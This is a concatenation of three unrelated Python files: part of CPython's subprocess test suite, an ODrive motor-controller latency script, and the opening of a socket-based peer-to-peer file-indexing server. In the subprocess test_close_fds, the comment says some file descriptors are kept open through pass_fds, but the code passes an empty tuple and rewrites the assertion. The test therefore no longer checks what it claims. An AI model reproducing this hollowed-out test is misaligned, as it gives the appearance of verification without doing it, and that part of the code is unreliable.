except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# allow some time for the process to exit, then create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipIf(not ctypes, 'ctypes module required')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable')
def test_child_terminated_in_stopped_state(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
PTRACE_TRACEME = 0 # From glibc and MacOS (PT_TRACE_ME).
libc_name = ctypes.util.find_library('c')
libc = ctypes.CDLL(libc_name)
if not hasattr(libc, 'ptrace'):
raise unittest.SkipTest('ptrace() required')
code = textwrap.dedent(f"""
import ctypes
import faulthandler
from test.support import SuppressCrashReport
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
""")
child = subprocess.Popen([sys.executable, '-c', code])
if child.wait() != 0:
raise unittest.SkipTest('ptrace() failed - unable to test')
code += textwrap.dedent(f"""
with SuppressCrashReport():
# Crash the process
faulthandler._sigsegv()
""")
child = subprocess.Popen([sys.executable, '-c', code])
try:
returncode = child.wait()
except:
child.kill() # Clean up the hung stopped process.
raise
self.assertNotEqual(0, returncode)
self.assertLess(returncode, 0) # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises((FileNotFoundError, PermissionError)) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
timing_test.py
|
import odrive
import time
import math
import threading
thread_active = True
serial_a = "208239904D4D" #String containing front ODrive's serial number in hex format all capitals
serial_b = "206039994D4D" #String containing back ODrive's serial number in hex format all capitals
odrv = odrive.find_any(serial_number=serial_a)
odrv_b= odrive.find_any(serial_number=serial_b)
axis = odrv.axis0
axis_thread = odrv.axis0
def thread_test():
x=1
loops = 0
thread_start_time = time.perf_counter()
while thread_active:
x=1
axis_thread.controller.input_vel = x
measured = axis_thread.controller.input_vel
x=2
axis_thread.controller.input_vel = x
measured = axis_thread.controller.input_vel
loops+=2
thread_average_time_taken = (time.perf_counter()-thread_start_time)/loops
print(f"Thread performed {loops} loops with average of {thread_average_time_taken}s")
print()
print()
print()
x = 1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = -1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 1.1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 1.0000001
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 2.314141525321241513523253415623542783542678542678354254254267354
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = math.pi
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
print(f"Average time taken 1000 loops is: {taken}s")
print()
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread is: {taken}s")
print()
thread_active = True
axis_thread = odrv.axis1
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread is: {taken}s")
print()
axis_thread = odrv_b.axis0
thread_active = True
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread on other drive is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis = odrv.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/8000
print(f"Average time taken 1000 changing drive loops is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis = odrv.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/8000
print(f"Average time taken 1000 changing drive loops alternative order is: {taken}s")
print()
print()
print()
|
server.py
|
import os
import sys
import socket
import threading
import json
import click
SIZE = 1024
FORMAT = "utf-8"
SERVER_DATA_PATH = "./"
peer_table = {}
filesize_table = {}
md5_table = {}
cond = threading.Condition()
def clientHandler(conn, addr):
global peer_table
global cond
full_addr = addr[0] + ":" + str(addr[1])
print(f"[NEW CONNECTION] {addr} connected.")
conn.send(json.dumps({"type": "OK", "msg": "Welcome to indexing server!"}).encode(FORMAT))
while True:
data = conn.recv(SIZE).decode(FORMAT)
if not data:
# delete record in peer_table when data = None, client has disconnected
print(f"[UNREGISTER] {full_addr} unrigistered")
cond.acquire()
peer_table.pop(full_addr, None)  # peer may disconnect before ever registering
cond.release()
break
json_data = json.loads(data)
if json_data["action"] == "REGISTER":
# register file list from peers
print(f"[REGISTER] {full_addr} registerd")
cond.acquire()
peer_table[full_addr] = json_data["filelist"]
for i in range(len(json_data['filelist'])):
filesize_table[json_data['filelist'][i]] = json_data['filesizelist'][i]
md5_table[json_data['filelist'][i]] = json_data['md5list'][i]
# print(peer_table)
# print(filesize_table)
cond.release()
elif json_data["action"] == "UPDATE":
# Update file list of peers
print(f"[UPDATE] {full_addr} file list updated")
cond.acquire()
peer_table[full_addr] = json_data["filelist"]
for i in range(len(json_data['filelist'])):
filesize_table[json_data['filelist'][i]] = json_data['filesizelist'][i]
md5_table[json_data['filelist'][i]] = json_data['md5list'][i]
# print(peer_table)
cond.release()
elif json_data["action"] == "QUERY":
# query for a file
query_file = json_data["file"]
print(f"[QUERY] {full_addr} query {query_file}")
res = []
cond.acquire()
for peer, filelist in peer_table.items():
if peer != full_addr and query_file in filelist:
res.append(peer)
cond.release()
if len(res) > 0:
conn.send(json.dumps({"type": "QUERY-RES", "peerlist": res, "file": query_file, "filesize": filesize_table[query_file], "md5": md5_table[query_file]}).encode(FORMAT))
else:
conn.send(json.dumps({"type": "QUERY-RES", "peerlist": res, "file": query_file, "filesize": 0, "md5": 0}).encode(FORMAT))
conn.close()
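# A minimal sketch (not part of the original script) of the JSON messages the
# handler above expects from a peer; the field names come from the parsing code
# above, while the concrete values are illustrative placeholders only:
#
#   {"action": "REGISTER", "filelist": ["a.txt"], "filesizelist": [123], "md5list": ["<md5>"]}
#   {"action": "UPDATE", "filelist": ["a.txt", "b.txt"], "filesizelist": [123, 456], "md5list": ["<md5>", "<md5>"]}
#   {"action": "QUERY", "file": "b.txt"}
#
# A QUERY is answered with {"type": "QUERY-RES", "peerlist": [...], "file": ..., "filesize": ..., "md5": ...}.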
@click.command()
@click.option('--port',
default="5000",
help='Hosting port')
